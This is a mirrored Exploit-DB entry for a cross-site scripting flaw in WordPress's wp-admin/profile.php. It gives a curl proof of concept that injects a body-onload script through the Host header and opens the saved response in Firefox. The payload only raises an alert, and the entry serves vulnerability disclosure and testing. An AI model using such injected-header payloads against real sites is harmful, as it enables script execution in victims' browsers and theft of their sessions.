exploit-db-mirror/exploits/php/webapps/10090.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

8 lines
No EOL
310 B
Text

An attacker can exploit this issue by enticing an unsuspecting user to follow a malicious URI.
The following proof of concept is available:
curl -H "Cookie: my cookies here" -H "Host: <body
onload=alert(String.fromCharCode(88,83,83))>"
http://www.example.com/wp-admin/profile.php> tmp.html
$ firefox tmp.html